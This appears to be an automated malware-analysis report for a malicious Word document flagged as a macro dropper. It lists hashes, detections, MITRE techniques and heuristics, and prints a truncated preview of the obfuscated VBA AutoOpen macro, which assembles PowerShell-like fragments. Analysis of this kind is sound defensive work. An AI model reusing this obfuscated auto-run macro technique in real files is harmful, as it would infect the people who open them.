Office (OLE) malware analysis — malicious · 30e8c00b1e8a226a

MALICIOUS

Office (OLE)

316.5 KB Created: 2018-10-16 08:13:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 05862fa2299320ff64e7d6f3e44e2ec8 SHA-1: d3ef0b6d6b0a8ef28ba0015352e04147020c333c SHA-256: 30e8c00b1e8a226ac05a206072e2b421544f02122c707ccaaaaf80c5adf44e19

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes CreateObject, indicating an attempt to execute arbitrary code. ClamAV detection as 'Doc.Dropper.Agent-7148214-0' further supports its malicious nature. The macro's obfuscated nature prevents a detailed analysis of its specific actions, but its presence and the CreateObject call strongly suggest it acts as a dropper for a secondary payload.

Heuristics 8

ClamAV: Doc.Dropper.Agent-7148214-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7148214-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 207295 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	207295 bytes
SHA-256: `d972a6414e46f079920a63664794d85079d11443be3a7f10fad4e51d09b301a0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function uadpru() Dim teueay As Integer teueay = -164 + 36 abqyiu = -143 / 157 yiaiuzw = -85 * 91 Dim ieyszykdyq0 As String ieyszykdyq0 = -72 + 85 End Function Function kmbqeha() gylyea = -58 - 23 End Function Function uaoxs5(irnie) oprfheiu95 = -151 * 90 End Function Function uuzuo() tinsicb = -141 - 138 yhjoigteo1 = -24 + 70 End Function Function qfuwzfhhj(xqzaottl84, nkhmkhholl, ylie78) rcwmte = -56 - 37 Dim xbkyizgra As Integer xbkyizgra = -140 / 89 iglzgxopa = -151 / 83 yandnqnpqa = -27 / 102 End Function Function askecn() upmijzuucg = -42 + 140 ojwkvegjy = -86 * 36 wroherqkhap = -76 - 22 bdadwsl = -179 * 99 End Function Function whxujb(ouuu) ubvyxztay18 = -3 + 110 zvaxjhd5 = -174 * 27 uaki = -133 + 72 End Function Function axbtk(uabudhn, dbdbuo) smhhyd = -97 * 74 End Function Function aoee() Dim bwakedie As String bwakedie = -67 * 156 ggkmkkj = -46 / 75 rqpzflogi = -159 - 156 End Function Function pcyvytzjj(lxdcxkgj, caecbsu, jnesi) yoslixdy = -148 - 155 weysv = -88 + 20 kighzxa4 = -36 * 155 End Function Function ioea(ukmif, zgdjiu, eimbfhqtzd) agzlpbgadcit = -87 + 1 oaxnmrvvfa = -34 + 158 End Function Function jjpeosht(hhlaiw, rnumqcny, ambzdqqe) gery58 = -11 / 16 kigmvfa = -139 + 126 mptydjoqe = -31 / 65 End Function Function onkrmijhlg(tqjkmfy, iaeomp) ucdsaohe = -167 / 38 zfzzsqxxtudf = -145 + 71 Dim azwnpeazpmm As String azwnpeazpmm = -69 + 14 ikgthjbwqz = -90 + 108 End Function Function isdayucb0(jqeart, ctlhe1) Dim towbfezg, ufbmfjs, zxlykd, riffrfo As String towbfezg = -155 + 48 dkzbyx = -171 * 89 nqxqyeurwo = -166 / 104 End Function Function auwavr() yhaurcrqhlk = -131 + 9 yaia = -140 + 126 crxjiqsi = -164 / 55 End Function Function kjanbwbkz05(udjcnyx, iiizwowl, cjmvyti55) xyjvma9 = -23 / 67 End Function Function yoed() hsoypwxaq34 = -69 * 141 anrzdgdee = -43 + 22 tkuidhagd = -119 / 45 deolhe = -8 - 135 End Function Function eefkyiu0(ybmwdpyo8, zjcypfb) Dim vqirzu As Integer vqirzu = -30 * 51 dcuio = -177 - 157 yiairrryd = -157 / 98 End Function Sub AutoOpen() eiei97 = -25 + 11 eoghegfq = -119 + 103 abzwlahrh13 = "zahbviyeae" hwraueg2 = "iiz='t.W" cfsxjpfchtgzbji = -153 + 168 oppjkhheu = -52 - 175 yrhmtbhq = -79 * 18 giloii = -157 - 49 rsqjyuijg5 = "ebclie';$qhkeftohbouaigaj" ymruhducuz = -87 / 26 vngajiyfa = -100 + 88 yiefvhxw = "wuin='t-Sle';" kdfzdbqcnfp = -67 / 101 qdsjwsoglky = -55 / 99 efmoyy = -18 - 145 oiabytx16 = "$lozimaga" Dim gvoo, ypbycko As String gvoo = -170 + 86 aljll = "grigcouowfgq79='ll32 $pa'" dzehpoi = -96 - 19 npmo = -50 + 148 fhqdrvlamma9 = -177 / 105 ktyqmnbo7 = -12 + 69 jqibgdq = ";$kiyeneoaevjyowgkr=' -" egos = -174 / 12 tnshaia = -80 * 111 uqdonchjfu = -178 / 42 yyuuybj = -126 / 36 pgduap = -106 + 70 vggqmxyp = "rec';" ohsvkfao = abzwlahrh13 & hwraueg2 & rsqjyuijg5 & yiefvhxw & oiabytx16 & aljll & jqibgdq & vggqmxyp diioxuo60 = -151 * 8 Dim gkiowgyods As String gkiowgyods = -54 / 82 Dim keoyeuup7, oufka, syebkyi, fwgadwoaku0 As Integer keoyeuup7 = -19 * 127 iydy = -17 / 56 zsdqowro79 = -152 + 104 yqmeoc = -43 + 174 yziof = -60 - 117 iuuwtybrobw6 = -52 - 173 oozxuu = "kr+$oufglgclo" jvavmu = -158 + 154 expyor = -49 - 91 dtxmnii = "dvmvyobryue+$tjhbshfophv" dvalgiadhzki5 = -46 / 43 Dim rpyuaaurc As Integer rpyuaaurc = -174 - 103 Dim ogeiadvxw As String ogeiadvxw = -101 / 96 eouwkk = "te" Dim vvxeyywn As String vvxeyywn = -5 - 69 mxpt = "mp" oyeoas = -163 - 47 ouleve = -106 / 59 uiymcugdii = -145 - 113 eiviy = -93 - 160 hweiuhge = eouwkk & mxpt ewcuou = -73 + 109 ipmjxoyoe47 = -97 * 174 ypnaaa = -10 + 98 wcyeymd = "nsw" xaeoyuehg = -70 + 28 eaop = -130 / 159 ilnyie = "qzggavz+$hdaanyeznob" ixwaeeh = -112 + 97 jr ... (truncated)

SHA-256: d972a6414e46f079920a63664794d85079d11443be3a7f10fad4e51d09b301a0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function uadpru()
Dim teueay As Integer
teueay = -164 + 36
abqyiu = -143 / 157
yiaiuzw = -85 * 91
Dim ieyszykdyq0 As String
ieyszykdyq0 = -72 + 85
End Function
Function kmbqeha()
gylyea = -58 - 23
End Function
Function uaoxs5(irnie)
oprfheiu95 = -151 * 90
End Function
Function uuzuo()
tinsicb = -141 - 138
yhjoigteo1 = -24 + 70
End Function
Function qfuwzfhhj(xqzaottl84, nkhmkhholl, ylie78)
rcwmte = -56 - 37
Dim xbkyizgra As Integer
xbkyizgra = -140 / 89
iglzgxopa = -151 / 83
yandnqnpqa = -27 / 102
End Function
Function askecn()
upmijzuucg = -42 + 140
ojwkvegjy = -86 * 36
wroherqkhap = -76 - 22
bdadwsl = -179 * 99
End Function
Function whxujb(ouuu)
ubvyxztay18 = -3 + 110
zvaxjhd5 = -174 * 27
uaki = -133 + 72
End Function
Function axbtk(uabudhn, dbdbuo)
smhhyd = -97 * 74
End Function
Function aoee()
Dim bwakedie As String
bwakedie = -67 * 156
ggkmkkj = -46 / 75
rqpzflogi = -159 - 156
End Function
Function pcyvytzjj(lxdcxkgj, caecbsu, jnesi)
yoslixdy = -148 - 155
weysv = -88 + 20
kighzxa4 = -36 * 155
End Function
Function ioea(ukmif, zgdjiu, eimbfhqtzd)
agzlpbgadcit = -87 + 1
oaxnmrvvfa = -34 + 158
End Function
Function jjpeosht(hhlaiw, rnumqcny, ambzdqqe)
gery58 = -11 / 16
kigmvfa = -139 + 126
mptydjoqe = -31 / 65
End Function
Function onkrmijhlg(tqjkmfy, iaeomp)
ucdsaohe = -167 / 38
zfzzsqxxtudf = -145 + 71
Dim azwnpeazpmm As String
azwnpeazpmm = -69 + 14
ikgthjbwqz = -90 + 108
End Function
Function isdayucb0(jqeart, ctlhe1)
Dim towbfezg, ufbmfjs, zxlykd, riffrfo As String
towbfezg = -155 + 48
dkzbyx = -171 * 89
nqxqyeurwo = -166 / 104
End Function
Function auwavr()
yhaurcrqhlk = -131 + 9
yaia = -140 + 126
crxjiqsi = -164 / 55
End Function
Function kjanbwbkz05(udjcnyx, iiizwowl, cjmvyti55)
xyjvma9 = -23 / 67
End Function
Function yoed()
hsoypwxaq34 = -69 * 141
anrzdgdee = -43 + 22
tkuidhagd = -119 / 45
deolhe = -8 - 135
End Function
Function eefkyiu0(ybmwdpyo8, zjcypfb)
Dim vqirzu As Integer
vqirzu = -30 * 51
dcuio = -177 - 157
yiairrryd = -157 / 98
End Function
Sub AutoOpen()
eiei97 = -25 + 11
eoghegfq = -119 + 103
abzwlahrh13 = "zahbviyeae"
hwraueg2 = "iiz='t.W"
cfsxjpfchtgzbji = -153 + 168
oppjkhheu = -52 - 175
yrhmtbhq = -79 * 18
giloii = -157 - 49
rsqjyuijg5 = "ebclie';$qhkeftohbouaigaj"
ymruhducuz = -87 / 26
vngajiyfa = -100 + 88
yiefvhxw = "wuin='t-Sle';"
kdfzdbqcnfp = -67 / 101
qdsjwsoglky = -55 / 99
efmoyy = -18 - 145
oiabytx16 = "$lozimaga"
Dim gvoo, ypbycko As String
gvoo = -170 + 86
aljll = "grigcouowfgq79='ll32 $pa'"
dzehpoi = -96 - 19
npmo = -50 + 148
fhqdrvlamma9 = -177 / 105
ktyqmnbo7 = -12 + 69
jqibgdq = ";$kiyeneoaevjyowgkr=' -"
egos = -174 / 12
tnshaia = -80 * 111
uqdonchjfu = -178 / 42
yyuuybj = -126 / 36
pgduap = -106 + 70
vggqmxyp = "rec';"
ohsvkfao = abzwlahrh13 & hwraueg2 & rsqjyuijg5 & yiefvhxw & oiabytx16 & aljll & jqibgdq & vggqmxyp
diioxuo60 = -151 * 8
Dim gkiowgyods As String
gkiowgyods = -54 / 82
Dim keoyeuup7, oufka, syebkyi, fwgadwoaku0 As Integer
keoyeuup7 = -19 * 127
iydy = -17 / 56
zsdqowro79 = -152 + 104
yqmeoc = -43 + 174
yziof = -60 - 117
iuuwtybrobw6 = -52 - 173
oozxuu = "kr+$oufglgclo"
jvavmu = -158 + 154
expyor = -49 - 91
dtxmnii = "dvmvyobryue+$tjhbshfophv"
dvalgiadhzki5 = -46 / 43
Dim rpyuaaurc As Integer
rpyuaaurc = -174 - 103
Dim ogeiadvxw As String
ogeiadvxw = -101 / 96
eouwkk = "te"
Dim vvxeyywn As String
vvxeyywn = -5 - 69
mxpt = "mp"
oyeoas = -163 - 47
ouleve = -106 / 59
uiymcugdii = -145 - 113
eiviy = -93 - 160
hweiuhge = eouwkk & mxpt
ewcuou = -73 + 109
ipmjxoyoe47 = -97 * 174
ypnaaa = -10 + 98
wcyeymd = "nsw"
xaeoyuehg = -70 + 28
eaop = -130 / 159
ilnyie = "qzggavz+$hdaanyeznob"
ixwaeeh = -112 + 97
jr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.